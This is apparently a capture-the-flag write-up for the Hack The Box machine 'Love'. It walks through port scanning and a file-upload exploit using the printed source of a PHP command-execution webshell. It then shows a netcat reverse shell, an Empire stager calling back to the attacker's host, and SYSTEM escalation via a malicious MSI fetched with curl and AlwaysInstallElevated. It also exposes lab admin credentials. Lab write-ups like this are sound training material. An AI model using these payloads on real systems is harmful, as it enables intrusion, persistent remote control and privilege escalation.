Really interesting box. We understood a cuppa new things and methods there. So sit tight and read through. Enjoy!
RECON PHASE
NMAP
As usual, we enumerate our target’s services.
# nmap -sV -sC -p- love.htb -oA love 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 04:35 EDT
Stats: 0:02:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 94.74% done; ETC: 04:37 (0:00:05 remaining)
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.050s latency).
Not shown: 65516 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_ssl-date: 2021-08-05T09:05:25+00:00; +26m04s from scanner time.
| tls-alpn:
|_ http/1.1
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
Service Info: Hosts: LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 26m03s, deviation: 0s, median: 26m03s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-05T09:05:12
|_ start_date: N/A
NESSUS Scan
First, ran port scan to remove false-positives from nmap result:
Then I ran Basic Network Scan. The scan so far discovered multiple vulnerabilities which will be analysed during exploit phase.
Manual Recon of the Attack Surface
Port 80 HTTP
We have a login form on the index page of the love’s web service. I have tested the input fields for special characters and got an error that gives out some important information:
- Server: Apache 2.4.45
- It is of type php v7.3.27
- It is on a Windows x64
- OpenSSL v1.1.1j
- Additionally, we got information about filesystem and the internal location of server.
- PORT 5000 HTTP
We don’t have permissions to see the website:
┌──(root💀kali)-[~]
└─# curl 10.10.10.239:5000 130 ⨯
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at 10.10.10.239 Port 5000</address>
</body></html>
- PORT 443 HTTPS
It appears that we don’t have access (forbidden) to the 443 love.htb domain however, the nmap scan reveals a subdomain called “staging” which usually means under development. Add the staging subdomain in the hosts file (/etc/hosts) in order to be able to query it.
I have poked the input in order to test for weakness in the input validation mechanism. And then it hit me that the service could probably access port 5000!
Vote Admin Creds admin: @LoveIsInTheAir!!!!
- Port 445, 139 SMB
We know from our initial scan that there is an smb service running. Let’s figure its identity.
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.10.10.239:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{781dd960-f30d-4aa0-b1c5-efbe7902f2d9}) (authentication domain:LOVE)
[+] 10.10.10.239:445 - Host is running Windows 10 Pro (build:19042) (name:LOVE)
[*] 10.10.10.239: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
- Dirbuster Output
Our directory enumeration revealed admin login panel.
Expoit Phase
We have credentials and an admin panel. Let’s try them:
Admin:@LoveIsInTheAir!!!!
First ,we need to create a Position in order to create a candidate. At the candidates page, we are able to upload image when creating one.
I managed to upload a nice and stable shell.
The file was taken from joswr1ght github – easy simple php webshell
The code of the file:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
To access the shell, we visit the /images/ directory and open the file that contains this code:
Let’s create a reverse shell. First, I upload nc.exe located in /usr/share/windows/resources/nc.exe to the images directory. Next, I use the webshell to execute the nc.exe to listen on port 1234 and when connected to, will spawn cmd shell.
# nc 10.10.10.239 1234 1 ⨯
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\omrs\images>
Privilege Escalation
System information
systeminfo is a command that we run to provide us with information about the system (obviously)
C:\tmp>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
What users are there on the system? What permissions do I have?
C:\tmp>net users
net users
User accounts for \\LOVE
-------------------------------------------------------------------------------
admin123 Administrator DefaultAccount
Guest Phoebe WDAGUtilityAccount
The command completed successfully.
C:\tmp>net user phoebe
net user phoebe
User name Phoebe
Full Name Phoebe
Comment Workstation Power User
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/12/2021 12:54:30 PM
Password expires Never
Password changeable 4/12/2021 12:54:30 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/5/2021 6:09:49 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
Setup Empire
In the following lines I have done the following:
- I have created an http listener, renamed it as “love” and ran it.
- I went back a directory then I have listed the active listeners to check if it is running correctly.
- Created a stager for windows as a .bat file called launcher. Edited its features to make it persistent and not delete itself after reboot or insertion. Then Added the stager to the love listener we created previously. Finally, executed it which actually created the file in /tmp/ directory.
- Uploaded the file from the web application into the images directory and then used the already existing shell to execute the launcher.bat file.
(Empire: listeners) > uselistener http
(Empire: listeners/http) > set Name love
(Empire: listeners/http) > execute
[*] Starting listener 'love'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
(Empire: listeners/http) > back
(Empire: listeners) > list
[*] Active listeners:
Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
love http http://10.10.14.3:80 5/0.0
(Empire: listeners) > usestager windows/launcher_bat
(Empire: stager/windows/launcher_bat) > set Delete False
(Empire: stager/windows/launcher_bat) > set Listener love
(Empire: stager/windows/launcher_bat) > execute
[*] Stager output written out to: /tmp/launcher.bat
(Empire: stager/windows/launcher_bat) >
[*] Sending POWERSHELL stager (stage 1) to 10.10.10.239
[*] New agent TBVR8X2S checked in
[+] Initial agent TBVR8X2S from 10.10.10.239 now active (Slack)
[*] Sending agent (stage 2) to TBVR8X2S at 10.10.10.239
(Empire: stager/windows/launcher_bat) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
TBVR8X2S ps 10.10.10.239 LOVE LOVE\Phoebe powershell 6192 5/0.0 2021-08-09 12:04:57 love
To interact with it easily – rename it to something, then simply type “interact \”:
(Empire: stager/windows/launcher_bat) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
TBVR8X2S ps 10.10.10.239 LOVE LOVE\Phoebe powershell 6192 5/0.0 2021-08-09 12:04:57 love
(Empire: agents) > rename TBVR8X2S windows10
(Empire: agents) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
windows1 ps 10.10.10.239 LOVE LOVE\Phoebe powershell 6192 5/0.0 2021-08-09 12:09:25 love
(Empire: agents) > interact windows10
(Empire: windows10) >
Using powerUp.ps1
#FINDINGS#
(Empire: powershell/privesc/powerup/allchecks) > run
[*] Tasked TBVR8X2S to run TASK_CMD_JOB
[*] Agent TBVR8X2S tasked with task ID 4
[*] Tasked agent windows10 to run module powershell/privesc/powerup/allchecks
(Empire: powershell/privesc/powerup/allchecks) >
Job started: 1P6W8C
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Checking service executable and argument permissions...
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
ServiceName : edgeupdate
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdate'
CanRestart : False
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
ServiceName : edgeupdatem
Path : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile : C:\
ModifiableFilePermissions : {Delete, GenericWrite, GenericExecute, GenericRead}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart : False
[*] Checking for AlwaysInstallElevated registry key...
AbuseFunction : Write-UserAddMSI
[*] Checking %PATH% for potentially hijackable DLL locations...
ModifiablePath : C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps
IdentityReference : LOVE\Phoebe
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps
AbuseFunction : Write-HijackDll -DllPath 'C:\Users\Phoebe\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
After trying a couple of times to hijack DLL, I was unsuccessful – even though I did it correctly. Perhaps the reason is because it needs some type of user interaction or requirements that are unmet. And proceeded to further enumerate the system with winPEAS:
A quick google search shows us how to exploit this:
First, setup a listener to catch the connection. Then follow the steps from the provided link to create a reverse shell with msfvenom, move the file onto the victim machine and then run msiexec as follows:
C:\Users\Phoebe\Desktop>curl http://10.10.14.3:8888/frustrated.msi -o alwaysinstallelevated.msi
curl http://10.10.14.3:8888/reverse.msi -o alwaysinstallelevated.msi
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 156k 100 156k 0 0 156k 0 0:00:01 --:--:-- 0:00:01 500k
C:\Users\Phoebe\Desktop>msiexec /quiet /qn /i alwaysinstallelevated.msi
msiexec /quiet /qn /i alwaysinstallelevated.msi
# nc -nlvp 4321 1 ⨯
listening on [any] 4321 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.239] 58312
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>
We did it bois.
Try smarter, not harder. 